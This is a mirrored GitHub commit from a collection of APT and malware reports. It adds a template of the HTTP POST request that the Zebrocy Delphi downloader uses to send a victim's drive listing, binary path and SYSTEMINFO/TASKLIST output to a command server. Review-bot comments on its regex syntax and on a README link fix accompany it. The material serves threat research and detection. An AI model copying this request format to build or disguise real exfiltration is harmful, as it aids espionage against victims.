mirror of
https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections
synced 2024-06-24 07:49:57 +00:00
2018.04.24.sednit-update-analysis-zebrocy
parent
00614bb5b1
commit
d94c6fcbae
19
2018/2018.04.24.sednit-update-analysis-zebrocy/Delphi_downloader_HTTP_POST_request.txt
Normal file
@ -0,0 +1,19 @@
|
||||
POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat)?fort=<SerialNumber_C> HTTP/1.0
|
||||
|
||||
Connection: keep-alive
|
||||
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
Content-Length: xxxx
|
||||
|
||||
Host: <ip_address>
|
||||
|
||||
Accept: text/html, */*
|
||||
|
||||
Accept-Encoding: identity
|
||||
|
||||
User-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
|
||||
|
||||
pol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A<DriveListing>%0D%0A%0D%0A<Path_to_the_binary>%0D%0A%0D%0A<SYSTEMINFO & TASKLIST output>
|
||||
|
||||
[...]
|
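Review bot: In the request-line pattern, the `?` in `\.(php|dat)?fort=<SerialNumber_C>` is unescaped, so anyone reading the line as a regular expression gets an optional extension followed directly by `fort=`, and the literal query separator is never matched; `\.(php|dat)\?fort=` would describe the request as it appears on the wire. The file also mixes regex syntax (the request line, `(AM|PM)` in the body) with placeholders such as `<ip_address>`, `xxxx` and `[...]` and carries no legend. A short header saying which parts are pattern, which are placeholders, and which report the template accompanies would make it usable as a detection reference.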
Binary file not shown.
@ -16,7 +16,8 @@ Please fire issue to me if any lost APT/Malware events/campaigns.
|
||||
|
||||
|
||||
## 2018
|
||||
* Apr 23 - [[Kaspersky] Energetic Bear/Crouching Yeti: attacks on servers](https://securelist.com/energetic-bear-crouching-yeti/85345/) | [Local](../../blob/master/2018/2018.04.12.operation-parliament)
|
||||
* Apr 24 - [[ESET] Sednit update: Analysis of Zebrocy](https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/) | [Local](../../blob/master/2018/2018.04.24.sednit-update-analysis-zebrocy)
|
||||
* Apr 23 - [[Kaspersky] Energetic Bear/Crouching Yeti: attacks on servers](https://securelist.com/energetic-bear-crouching-yeti/85345/) | [Local](../../blob/master/2018/2018.04.23.energetic-bear-crouching-yeti)
|
||||
* Apr 12 - [[Kaspersky] Operation Parliament, who is doing what?](https://securelist.com/operation-parliament-who-is-doing-what/85237/) | [Local](../../blob/master/2018/2018.04.12.operation-parliament)
|
||||
* Apr 04 - [[Trend Micro] New MacOS Backdoor Linked to OceanLotus Found](https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/) | [Local](../../blob/master/2018/2018.04.04.MacOS_Backdoor_OceanLotus)
|
||||
* Mar 29 - [[Trend Micro] ChessMaster Adds Updated Tools to Its Arsenal](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/) | [Local](../../blob/master/2018/2018.03.29.ChessMaster_Adds_Updated_Tools)
|
||||
|
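Review bot: Two Apr 23 Energetic Bear entries with the same title and URL appear in this hunk, and the first one links Local to 2018/2018.04.12.operation-parliament, the same directory the Apr 12 Operation Parliament entry uses. Confirm that this is the line being removed, so the list ends up with a single Apr 23 entry pointing at 2018/2018.04.23.energetic-bear-crouching-yeti. The commit title names only the Zebrocy report, so the link correction deserves a mention in the commit message or a commit of its own.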